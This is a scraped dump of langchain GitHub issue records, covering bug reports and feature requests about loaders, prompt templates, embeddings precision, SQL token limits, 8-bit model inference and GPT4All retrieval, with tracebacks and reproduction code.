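    metadatas=[document.metadata],
)
```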
### Expected behavior
The update_document method should update the specified document in the collection with the provided text and metadata.
| AttributeError: 'Collection' object has no attribute 'update_document' | https://api.github.com/repos/langchain-ai/langchain/issues/5031/comments | 4 | 2023-05-20T12:01:57Z | 2023-09-15T22:13:00Z | https://github.com/langchain-ai/langchain/issues/5031 | 1,718,150,791 | 5,031 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
```
INFO: Will watch for changes in these directories: ['/Users/abdibrokhim/VisualStudioCode/draft/antrophicCloudeLangchainTutorialApp']
INFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)
INFO: Started reloader process [58140] using WatchFiles
Process SpawnProcess-1:
Traceback (most recent call last):
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/multiprocessing/process.py", line 315, in _bootstrap
self.run()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/multiprocessing/process.py", line 108, in run
self._target(*self._args, **self._kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/_subprocess.py", line 76, in subprocess_started
target(sockets=sockets)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/server.py", line 60, in run
return asyncio.run(self.serve(sockets=sockets))
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "uvloop/loop.pyx", line 1517, in uvloop.loop.Loop.run_until_complete
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/server.py", line 67, in serve
config.load()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/config.py", line 477, in load
self.loaded_app = import_from_string(self.app)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/importer.py", line 24, in import_from_string
raise exc from None
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/uvicorn/importer.py", line 21, in import_from_string
module = importlib.import_module(module_str)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
File "<frozen importlib._bootstrap_external>", line 883, in exec_module
File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
File "/Users/abdibrokhim/VisualStudioCode/draft/antrophicCloudeLangchainTutorialApp/./main.py", line 6, in <module>
from langchain import PromptTemplate, LLMChain
ModuleNotFoundError: No module named 'langchain'
```
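For what it's worth (my guess, not from the report): the traceback shows uvicorn running under the framework Python at `/Library/Frameworks/Python.framework/...`, so langchain may have been installed into a different interpreter than the one serving the app. A quick check (my own sketch):
```python
# run this from inside main.py to see which interpreter uvicorn actually uses,
# then install langchain into exactly that interpreter:
#   <printed path> -m pip install langchain
import sys
print(sys.executable)
```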
### Suggestion:
_No response_ | Help me please, even i installed langchain library it says "No module named 'langchain'" why? | https://api.github.com/repos/langchain-ai/langchain/issues/5028/comments | 3 | 2023-05-20T10:55:13Z | 2023-05-20T19:24:56Z | https://github.com/langchain-ai/langchain/issues/5028 | 1,718,135,190 | 5,028 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version = 0.0.167
Python version = 3.11.0
System = Windows 11 (using Jupyter)
### Who can help?
- @hwchase17
- @agola11
- @UmerHA (I have a fix ready, will submit a PR)
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
import os
os.environ["OPENAI_API_KEY"] = "..."

from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from langchain.prompts import PromptTemplate
from langchain.prompts.chat import ChatPromptTemplate
from langchain.schema import messages_from_dict

role_strings = [
    ("system", "you are a bird expert"),
    ("human", "which bird has a point beak?"),
]
prompt = ChatPromptTemplate.from_role_strings(role_strings)
chain = LLMChain(llm=ChatOpenAI(), prompt=prompt)
chain.run({})
```
### Expected behavior
Chain should run | ChatOpenAI models don't work with prompts created via ChatPromptTemplate.from_role_strings | https://api.github.com/repos/langchain-ai/langchain/issues/5027/comments | 1 | 2023-05-20T10:39:18Z | 2023-05-30T20:56:20Z | https://github.com/langchain-ai/langchain/issues/5027 | 1,718,131,410 | 5,027 |
[
"hwchase17",
"langchain"
]
| ### Feature request
A utility to clean up documents or texts after they are loaded into langchain document formats. The LLMs sometimes even count redundant whitespace in the context as tokens, leading to wasted tokens. What I'm proposing is a utility that binds to the existing adapters in langchain and/or llama-index and cleans up documents (getting rid of redundant whitespace, removing special characters, restructuring them into a readable yet cost-efficient format, etc.), all while keeping the LLM's readability of the document in mind. The user should be able to choose what kind of cleanup they want.
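For illustration, a minimal sketch (my own; this is not an existing langchain or llama-index API) of what the core of such a utility could look like:
```python
import re
from typing import List

from langchain.schema import Document


def clean_documents(docs: List[Document], collapse_whitespace: bool = True,
                    strip_special: bool = False) -> List[Document]:
    """Configurable cleanup pass over loaded Documents."""
    cleaned = []
    for doc in docs:
        text = doc.page_content
        if collapse_whitespace:
            # collapse runs of whitespace into single spaces to save tokens
            text = re.sub(r"\s+", " ", text).strip()
        if strip_special:
            # drop characters outside a conservative readable set
            text = re.sub(r"[^\w\s.,;:!?'\"()\-]", "", text)
        cleaned.append(Document(page_content=text, metadata=doc.metadata))
    return cleaned
```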
### Motivation
I was having trouble with whitespace in the project I'm building with langchain, where it led to high token consumption. I tried to find a utility in either langchain or llama-index that I could use right out of the box for this, and was not able to find one.
### Your contribution
I could help build this feature if I have some instructions (dos and don'ts). | Document Cleanup Tools | https://api.github.com/repos/langchain-ai/langchain/issues/5026/comments | 1 | 2023-05-20T10:36:52Z | 2023-09-19T16:09:56Z | https://github.com/langchain-ai/langchain/issues/5026 | 1,718,130,806 | 5,026 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using version `0.0.171` of Langchain.
Running a Mac (M1, 2021, macOS Ventura). I can do almost all Langchain operations without errors, except for this issue. Installed through pyenv, Python 3.11.
```requirements.txt
aiohttp==3.8.4
aiosignal==1.3.1
anyio==3.6.2
appnope==0.1.3
argilla==1.7.0
argon2-cffi==21.3.0
argon2-cffi-bindings==21.2.0
arrow==1.2.3
asttokens==2.2.1
async-timeout==4.0.2
attrs==23.1.0
backcall==0.2.0
backoff==2.2.1
beautifulsoup4==4.12.2
-e git+ssh://[email protected]/mad-start/big-macs-llm.git@2998ca685b68d74ef20a12fe74c0f4cab6e48dcb#egg=big_macs_llm
bleach==6.0.0
certifi==2023.5.7
cffi==1.15.1
charset-normalizer==3.1.0
click==8.1.3
comm==0.1.3
commonmark==0.9.1
contourpy==1.0.7
cryptography==40.0.2
cycler==0.11.0
dataclasses-json==0.5.7
datasets==2.12.0
debugpy==1.6.7
decorator==5.1.1
defusedxml==0.7.1
Deprecated==1.2.13
dill==0.3.6
einops==0.6.1
et-xmlfile==1.1.0
executing==1.2.0
fastjsonschema==2.16.3
filelock==3.12.0
fonttools==4.39.4
fqdn==1.5.1
frozenlist==1.3.3
fsspec==2023.5.0
h11==0.14.0
httpcore==0.16.3
httpx==0.23.3
huggingface-hub==0.14.1
idna==3.4
iniconfig==2.0.0
ipykernel==6.23.1
ipython==8.13.2
ipython-genutils==0.2.0
ipywidgets==8.0.6
isoduration==20.11.0
jedi==0.18.2
Jinja2==3.1.2
joblib==1.2.0
jsonpointer==2.3
jsonschema==4.17.3
jupyter==1.0.0
jupyter-console==6.6.3
jupyter-events==0.6.3
jupyter_client==8.2.0
jupyter_core==5.3.0
jupyter_server==2.5.0
jupyter_server_terminals==0.4.4
jupyterlab-pygments==0.2.2
jupyterlab-widgets==3.0.7
kiwisolver==1.4.4
langchain==0.0.171
lxml==4.9.2
Markdown==3.4.3
MarkupSafe==2.1.2
marshmallow==3.19.0
marshmallow-enum==1.5.1
matplotlib==3.7.1
matplotlib-inline==0.1.6
mistune==2.0.5
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
multiprocess==0.70.14
mypy-extensions==1.0.0
nbclassic==1.0.0
nbclient==0.7.4
nbconvert==7.4.0
nbformat==5.8.0
nest-asyncio==1.5.6
networkx==3.1
nltk==3.8.1
notebook==6.5.4
notebook_shim==0.2.3
numexpr==2.8.4
numpy==1.23.5
olefile==0.46
openai==0.27.6
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
packaging==23.1
pandas==1.5.3
pandocfilters==1.5.0
parso==0.8.3
pdf2image==1.16.3
pdfminer.six==20221105
pexpect==4.8.0
pickleshare==0.7.5
Pillow==9.5.0
platformdirs==3.5.1
pluggy==1.0.0
prometheus-client==0.16.0
prompt-toolkit==3.0.38
psutil==5.9.5
ptyprocess==0.7.0
pure-eval==0.2.2
pyarrow==12.0.0
pycparser==2.21
pydantic==1.10.7
Pygments==2.15.1
pypandoc==1.11
pyparsing==3.0.9
pyrsistent==0.19.3
pytest==7.3.1
python-dateutil==2.8.2
python-docx==0.8.11
python-dotenv==1.0.0
python-json-logger==2.0.7
python-magic==0.4.27
python-pptx==0.6.21
pytz==2023.3
PyYAML==6.0
pyzmq==25.0.2
qtconsole==5.4.3
QtPy==2.3.1
regex==2023.5.5
requests==2.30.0
responses==0.18.0
rfc3339-validator==0.1.4
rfc3986==1.5.0
rfc3986-validator==0.1.1
rich==13.0.1
scikit-learn==1.2.2
scipy==1.10.1
Send2Trash==1.8.2
sentence-transformers==2.2.2
sentencepiece==0.1.99
six==1.16.0
sniffio==1.3.0
soupsieve==2.4.1
SQLAlchemy==2.0.13
stack-data==0.6.2
sympy==1.12
tabulate==0.9.0
tenacity==8.2.2
terminado==0.17.1
text-generation==0.5.2
threadpoolctl==3.1.0
tiktoken==0.4.0
tinycss2==1.2.1
tokenizers==0.13.3
torch==2.0.1
torchvision==0.15.2
tornado==6.3.2
tqdm==4.65.0
traitlets==5.9.0
transformers==4.29.2
typer==0.9.0
typing-inspect==0.8.0
typing_extensions==4.5.0
tzdata==2023.3
unstructured==0.6.8
uri-template==1.2.0
urllib3==2.0.2
wcwidth==0.2.6
webcolors==1.13
webencodings==0.5.1
websocket-client==1.5.1
widgetsnbextension==4.0.7
wrapt==1.14.1
XlsxWriter==3.1.0
xxhash==3.2.0
yarl==1.9.2
```
### Who can help?
@eyurtsev Thank you:
I got this code from [Langchain instructions here](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/file_directory.html#change-loader-class). While I am able to load and split a python file one at a time, I cannot do so for DirectoryLoaders that have `*.py` in the glob pattern. I tested this out without langchain and it worked just fine.
```python
from langchain.document_loaders.text import TextLoader
from langchain.document_loaders.directory import DirectoryLoader
loader = DirectoryLoader('../../../src', glob="**/*.py", loader_cls=TextLoader)
loader.load()
```
and
```python
from langchain.document_loaders.directory import DirectoryLoader
from langchain.document_loaders import PythonLoader
loader = DirectoryLoader('../../../../../', glob="**/*.py", loader_cls=PythonLoader)
loader.load()
```
yields an error:
`ValueError: Invalid file ../../../src/my_library/__init__.py. The FileType.UNK file type is not supported in partition.`
I looked up this error on the unstructured issues page, and then ran the following code with unstructured directly; it didn't error out and displayed the contents of the python module.
```python
from unstructured.partition.text import partition_text
elements = partition_text(filename='setup.py')
print("\n\n".join([str(el) for el in elements]))
```
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have written more detail above, but this can be reproduced like this.
```python
from langchain.document_loaders.directory import DirectoryLoader
from langchain.document_loaders import PythonLoader
loader = DirectoryLoader('../../../../../', glob="**/*.py", loader_cls=PythonLoader)
loader.load()
```
### Expected behavior
```zsh
---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[73], line 6
2 from langchain.document_loaders import PythonLoader
5 loader = DirectoryLoader('../../../../../', glob="**/*.py", loader_cls=PythonLoader)
----> 6 directory_loader.load()
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/directory.py:103, in DirectoryLoader.load(self)
101 else:
102 for i in items:
--> 103 self.load_file(i, p, docs, pbar)
105 if pbar:
106 pbar.close()
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/directory.py:69, in DirectoryLoader.load_file(self, item, path, docs, pbar)
67 logger.warning(e)
68 else:
---> 69 raise e
70 finally:
71 if pbar:
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/directory.py:63, in DirectoryLoader.load_file(self, item, path, docs, pbar)
61 if _is_visible(item.relative_to(path)) or self.load_hidden:
62 try:
---> 63 sub_docs = self.loader_cls(str(item), **self.loader_kwargs).load()
64 docs.extend(sub_docs)
65 except Exception as e:
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/unstructured.py:70, in UnstructuredBaseLoader.load(self)
68 def load(self) -> List[Document]:
69 """Load file."""
---> 70 elements = self._get_elements()
71 if self.mode == "elements":
72 docs: List[Document] = list()
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/unstructured.py:104, in UnstructuredFileLoader._get_elements(self)
101 def _get_elements(self) -> List:
102 from unstructured.partition.auto import partition
--> 104 return partition(filename=self.file_path, **self.unstructured_kwargs)
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/unstructured/partition/auto.py:206, in partition(filename, content_type, file, file_filename, url, include_page_breaks, strategy, encoding, paragraph_grouper, headers, ssl_verify, ocr_languages, pdf_infer_table_structure, xml_keep_tags)
204 else:
205 msg = "Invalid file" if not filename else f"Invalid file {filename}"
--> 206 raise ValueError(f"{msg}. The {filetype} file type is not supported in partition.")
208 for element in elements:
209 element.metadata.url = url
ValueError: Invalid file ../../../src/__init__.py. The FileType.UNK file type is not supported in partition.
``` | Cannot load python files for Directory Loader | https://api.github.com/repos/langchain-ai/langchain/issues/5025/comments | 1 | 2023-05-20T09:48:56Z | 2023-09-10T16:14:45Z | https://github.com/langchain-ai/langchain/issues/5025 | 1,718,119,181 | 5,025 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.173
numpy version: 1.24.3
### Related Components
- [X] Embedding Models
### Reproduction
```python
from sentence_transformers import SentenceTransformer
import numpy as np
from langchain.embeddings import HuggingFaceEmbeddings
t = 'langchain embedding'
m = HuggingFaceEmbeddings(encode_kwargs={"normalize_embeddings": True})
# SentenceTransformer embeddings with unit norm
x = SentenceTransformer(m.model_name).encode(t, normalize_embeddings=True)
# Langchain.Huggingface embeddings with unit norm
y = m.embed_query(t)
print(f'L2 norm of SentenceTransformer: {np.linalg.norm(x)}. \nL2 norm of Langchain.Huggingface: {np.linalg.norm(y)}')
```
### Expected behavior
Both of these L2 norm results should be 1, but I got the following:
```
L2 norm of SentenceTransformer: 1.0.
L2 norm of Langchain.Huggingface: 1.0000000445724682
```
I think the problem comes from this [code](https://github.com/hwchase17/langchain/blob/27e63b977aa07cb4ccb25b006c9af17310a9f530/langchain/embeddings/huggingface.py#LL87C34-L87C34): when the numpy float32 array is converted to a Python list, the values are widened to float64, so the norm is no longer exactly 1.0. | Precision of HuggingFaceEmbeddings.embed_query changes | https://api.github.com/repos/langchain-ai/langchain/issues/5024/comments | 2 | 2023-05-20T08:44:51Z | 2023-09-10T16:14:51Z | https://github.com/langchain-ai/langchain/issues/5024 | 1,718,103,064 | 5,024 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to query databases with multiple tables. Because of the DB metadata included in the prompt, the prompt length exceeds OpenAI's 4,000-token limit. Do you have any ideas on how to solve this problem for databases with medium to large metadata? I have tried it for PostgreSQL and Presto.
`InvalidRequestError: This model's maximum context length is 4097 tokens, however you requested 4995 tokens (4739 in your prompt; 256 for the completion). Please reduce your prompt; or completion length.`
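One mitigation worth trying (a sketch under my own assumptions; the URI and table names are placeholders) is limiting which tables' metadata are included in the prompt:
```python
from langchain import SQLDatabase

db = SQLDatabase.from_uri(
    "postgresql://user:pass@host:5432/dbname",  # placeholder URI
    include_tables=["orders", "customers"],     # only include the tables you query
    sample_rows_in_table_info=1,                # fewer sample rows -> shorter prompt
)
```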
### Suggestion:
_No response_ | SQL database with metadata exceeding 4000 token limit of Open AI. | https://api.github.com/repos/langchain-ai/langchain/issues/5023/comments | 1 | 2023-05-20T08:26:04Z | 2023-05-20T08:30:26Z | https://github.com/langchain-ai/langchain/issues/5023 | 1,718,098,699 | 5,023 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I have been using the RWKV LLM with langchain and everything is OK,
but I don't know how to rewrite `_call` to add LoRA for my own RWKV model. Can you give some tips?
### Motivation
-
### Your contribution
- | How to add LoRA for RWKV when using langchain | https://api.github.com/repos/langchain-ai/langchain/issues/5022/comments | 1 | 2023-05-20T08:12:51Z | 2023-09-10T16:14:57Z | https://github.com/langchain-ai/langchain/issues/5022 | 1,718,095,658 | 5,022 |
[
"hwchase17",
"langchain"
]
|
I was trying to use the `gpt-3.5` family of models as a proxy for Codex to generate code.
I tried using `PromptTemplate` and the `PydanticOutputParser` to get code output, but it turns out the LLM mixes the prompt template's format example into the response.
**Parser**
```python
from langchain.output_parsers import PydanticOutputParser
from pydantic import BaseModel, Field


class CodeCompletion(BaseModel):
    code: str = Field(description="completed code")


parser = PydanticOutputParser(pydantic_object=CodeCompletion)
```
**Prompt Template**
```python
template = """
I want you to act as an Code Assistant bot. please complete the following code written in {programming_language} programming language
{code}
Format the response in {format_instructions}
"""
code_completion_prompt = PromptTemplate(
    input_variables=["programming_language", "code"],
    partial_variables={"format_instructions": parser.get_format_instructions()},
    template=template,
)
```
**Prompt (generated by prompt template)**
```
I want you to act as an Code Assistant bot. please complete the following code written in python programming language
# Write a function to read json data from s3
def read_from_s3():
pass
Format the response in The output should be formatted as a JSON instance that conforms to the JSON schema below.
As an example, for the schema {"properties": {"foo": {"title": "Foo", "description": "a list of strings", "type": "array", "items": {"type": "string"}}}, "required": ["foo"]}}
the object {"foo": ["bar", "baz"]} is a well-formatted instance of the schema. The object {"properties": {"foo": ["bar", "baz"]}} is not well-formatted.
Here is the output schema:
\```
{"properties": {"code": {"title": "Code", "description": "completed code", "type": "string"}}, "required": ["code"]}
\```
```
**Output from LLM**
```
File "/Users/avikant/Projects/HackerGPT-backend/venv/lib/python3.11/site-packages/langchain/output_parsers/pydantic.py", line 31, in parse
raise OutputParserException(msg)
langchain.schema.OutputParserException: Failed to parse CodeCompletion from completion # Write a function to read json data from s3
import json
def read_from_s3(file_path):
with open(file_path, 'r') as f:
data = json.load(f)
return {"code": data}
response = read_from_s3("s3://path/to/file.json")
print(json.dumps(response)) # outputs {"code": {<data from file.json>}} in JSON format.. Got: Expecting value: line 1 column 10 (char 9)
```
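One possible direction (my own sketch, not part of the original report) is to wrap the parser in `OutputFixingParser`, which uses a second LLM call to repair malformed output; `raw_llm_output` is a hypothetical variable holding the completion shown above:
```python
from langchain.chat_models import ChatOpenAI
from langchain.output_parsers import OutputFixingParser

fixing_parser = OutputFixingParser.from_llm(parser=parser, llm=ChatOpenAI(temperature=0))
result = fixing_parser.parse(raw_llm_output)
print(result.code)
```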
### Suggestion:
A way to parse the code generation output | Issue: Prompt template does not work with Code related queries | https://api.github.com/repos/langchain-ai/langchain/issues/5020/comments | 2 | 2023-05-20T07:22:06Z | 2023-09-15T22:12:59Z | https://github.com/langchain-ai/langchain/issues/5020 | 1,718,084,155 | 5,020 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python Version = 3.10
Langchain Version = 0.0.174
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
Good evening,
I have been working on my own custom wrapper for a Huggingface model. I am using a custom wrapper as I plan to add additional features such as LoRA finetuning. I have loaded the model in 8 bit and received the error "topk_cpu" not implemented for 'Half'. This led me to conclude that 8-bit models are currently not supported for inference inside Langchain, though I am unsure if this is due to the library or faulty code on my end.
The code for the model is as follows:
```python
# Langchain imports
from typing import Any, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM

# Huggingface imports
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import torch
import torch.nn as nn
import bitsandbytes as bnb
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM

# Pydantic imports
from pydantic import BaseModel, Field


class HuggingFaceLLM(LLM):
    model_name: str = Field(default="facebook/opt-6.7b")
    tokenizer: AutoTokenizer = Field(default=None)
    model: AutoModelForCausalLM = Field(default=None)
    device: torch.device = Field(default=None)

    def __init__(self, model_name="facebook/opt-6.7b"):
        super().__init__()
        self.tokenizer = AutoTokenizer.from_pretrained(model_name)
        self.model = AutoModelForCausalLM.from_pretrained(model_name, load_in_8bit=True, device_map='auto')
        # self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        # self.model.to(self.device)

    @property
    def _llm_type(self) -> str:
        return "huggingface"

    def _call(
        self,
        prompt: str,
        temperature: float = 1.0,
        max_tokens: int = 512,
        stop: Optional[List[str]] = None,
        run_manager: Optional[CallbackManagerForLLMRun] = None,
    ) -> str:
        if stop is not None:
            raise ValueError("stop kwargs are not permitted.")
        # prepare input data
        input_ids = self.tokenizer.encode(prompt, return_tensors='pt')
        # generate text
        gen_tokens = self.model.generate(
            input_ids,
            do_sample=True,
            temperature=temperature,
            max_length=max_tokens,
        )
        # decode generated text
        gen_text = self.tokenizer.decode(gen_tokens[:, input_ids.shape[-1]:][0], skip_special_tokens=True)
        return gen_text

    @property
    def _identifying_params(self) -> Mapping[str, Any]:
        """Get the identifying parameters."""
        return {"model_name": self.model.config._name_or_path}


# Build model
llm = HuggingFaceLLM("facebook/opt-6.7b")

# Inference
llm("What is the fastest car")
```
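A possible cause worth checking (my assumption, not confirmed in the report): `input_ids` stays on the CPU while the 8-bit model is dispatched to the GPU, so generation ends up operating on CPU half-precision tensors. A sketch of moving the inputs inside `_call`:
```python
# move the encoded prompt onto the model's device before calling generate()
input_ids = self.tokenizer.encode(prompt, return_tensors='pt').to(self.model.device)
```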
---------------------------------------------------------------------------------------------------------------------------------------------
The traceback is here as follows:
```
╭─────────────────────────────── Traceback (most recent call last) ────────────────────────────────╮
│ in <module>:1 │
│ │
│ ❱ 1 llm("What is the fastest car") │
│ 2 │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:291 in __call__ │
│ │
│ 288 │ ) -> str: │
│ 289 │ │ """Check Cache and run the LLM on the given prompt and input.""" │
│ 290 │ │ return ( │
│ ❱ 291 │ │ │ self.generate([prompt], stop=stop, callbacks=callbacks) │
│ 292 │ │ │ .generations[0][0] │
│ 293 │ │ │ .text │
│ 294 │ │ ) │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:191 in generate │
│ │
│ 188 │ │ │ │ ) │
│ 189 │ │ │ except (KeyboardInterrupt, Exception) as e: │
│ 190 │ │ │ │ run_manager.on_llm_error(e) │
│ ❱ 191 │ │ │ │ raise e │
│ 192 │ │ │ run_manager.on_llm_end(output) │
│ 193 │ │ │ return output │
│ 194 │ │ if len(missing_prompts) > 0: │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:185 in generate │
│ │
│ 182 │ │ │ ) │
│ 183 │ │ │ try: │
│ 184 │ │ │ │ output = ( │
│ ❱ 185 │ │ │ │ │ self._generate(prompts, stop=stop, run_manager=run_manager) │
│ 186 │ │ │ │ │ if new_arg_supported │
│ 187 │ │ │ │ │ else self._generate(prompts, stop=stop) │
│ 188 │ │ │ │ ) │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:405 in _generate │
│ │
│ 402 │ │ new_arg_supported = inspect.signature(self._call).parameters.get("run_manager") │
│ 403 │ │ for prompt in prompts: │
│ 404 │ │ │ text = ( │
│ ❱ 405 │ │ │ │ self._call(prompt, stop=stop, run_manager=run_manager) │
│ 406 │ │ │ │ if new_arg_supported │
│ 407 │ │ │ │ else self._call(prompt, stop=stop) │
│ 408 │ │ │ ) │
│ │
│ in _call:33 │
│ │
│ 30 │ │ input_ids = self.tokenizer.encode(prompt, return_tensors='pt') │
│ 31 │ │ │
│ 32 │ │ # generate text │
│ ❱ 33 │ │ gen_tokens = self.model.generate( │
│ 34 │ │ │ input_ids, │
│ 35 │ │ │ do_sample=True, │
│ 36 │ │ │ temperature=temperature, │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/torch/utils/_contex │
│ tlib.py:115 in decorate_context │
│ │
│ 112 │ @functools.wraps(func) │
│ 113 │ def decorate_context(*args, **kwargs): │
│ 114 │ │ with ctx_factory(): │
│ ❱ 115 │ │ │ return func(*args, **kwargs) │
│ 116 │ │
│ 117 │ return decorate_context │
│ 118 │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/utils.py:1565 in generate │
│ │
│ 1562 │ │ │ ) │
│ 1563 │ │ │ │
│ 1564 │ │ │ # 13. run sample │
│ ❱ 1565 │ │ │ return self.sample( │
│ 1566 │ │ │ │ input_ids, │
│ 1567 │ │ │ │ logits_processor=logits_processor, │
│ 1568 │ │ │ │ logits_warper=logits_warper, │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/utils.py:2626 in sample │
│ │
│ 2623 │ │ │ │
│ 2624 │ │ │ # pre-process distribution │
│ 2625 │ │ │ next_token_scores = logits_processor(input_ids, next_token_logits) │
│ ❱ 2626 │ │ │ next_token_scores = logits_warper(input_ids, next_token_scores) │
│ 2627 │ │ │ │
│ 2628 │ │ │ # Store scores, attentions and hidden_states when required │
│ 2629 │ │ │ if return_dict_in_generate: │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/logits_process.py:92 in __call__ │
│ │
│ 89 │ │ │ │ │ ) │
│ 90 │ │ │ │ scores = processor(input_ids, scores, **kwargs) │
│ 91 │ │ │ else: │
│ ❱ 92 │ │ │ │ scores = processor(input_ids, scores) │
│ 93 │ │ return scores │
│ 94 │
│ 95 │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/logits_process.py:302 in __call__ │
│ │
│ 299 │ def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor) -> torch. │
│ 300 │ │ top_k = min(self.top_k, scores.size(-1)) # Safety check │
│ 301 │ │ # Remove all tokens with a probability less than the last token of the top-k │
│ ❱ 302 │ │ indices_to_remove = scores < torch.topk(scores, top_k)[0][..., -1, None] │
│ 303 │ │ scores = scores.masked_fill(indices_to_remove, self.filter_value) │
│ 304 │ │ return scores │
│ 305 │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
RuntimeError: "topk_cpu" not implemented for 'Half'
### Expected behavior
As mentioned earlier, I am not sure whether 8-bit precision is supported for inference inside LangChain.
I would expect inference to run without errors; when the model was loaded in full 16-bit precision, inference worked successfully.
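If it helps triage: my guess is that `input_ids` stays on the CPU while the 8-bit model produces half-precision logits, and `topk` has no half-precision CPU kernel. A sketch of the change I would try inside `_call` (the `.to(self.model.device)` call is my assumption, not a confirmed fix):

```python
input_ids = self.tokenizer.encode(prompt, return_tensors="pt").to(self.model.device)
gen_tokens = self.model.generate(
    input_ids,
    do_sample=True,
    temperature=temperature,
    max_length=max_tokens,
)
```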
| Text Generation on an 8 bit model. | https://api.github.com/repos/langchain-ai/langchain/issues/5019/comments | 2 | 2023-05-20T05:49:32Z | 2023-05-21T20:58:06Z | https://github.com/langchain-ai/langchain/issues/5019 | 1,718,062,726 | 5,019 |
[
"hwchase17",
"langchain"
]
| ### RetrievalQA chain with GPT4All takes an extremely long time to run (doesn't end)
I encounter massive runtimes when [running a RetrievalQA chain](https://python.langchain.com/en/latest/modules/chains/index_examples/vector_db_qa.html) with a locally downloaded GPT4All LLM. Unsure what's causing this.
I pass a GPT4All model (loading [ggml-gpt4all-j-v1.3-groovy.bin](https://gpt4all.io/models/ggml-gpt4all-j-v1.3-groovy.bin) model that I downloaded locally) to the RetrievalQA Chain. I have one source text document and use sentence-transformers from HuggingFace for embeddings (I'm using a fairly small model: [all-MiniLM-L6-v2](https://www.sbert.net/docs/pretrained_models.html)).
```python
llm = GPT4All(model=model_path, n_ctx=model_n_ctx, backend='gptj', callbacks=callbacks, verbose=True)
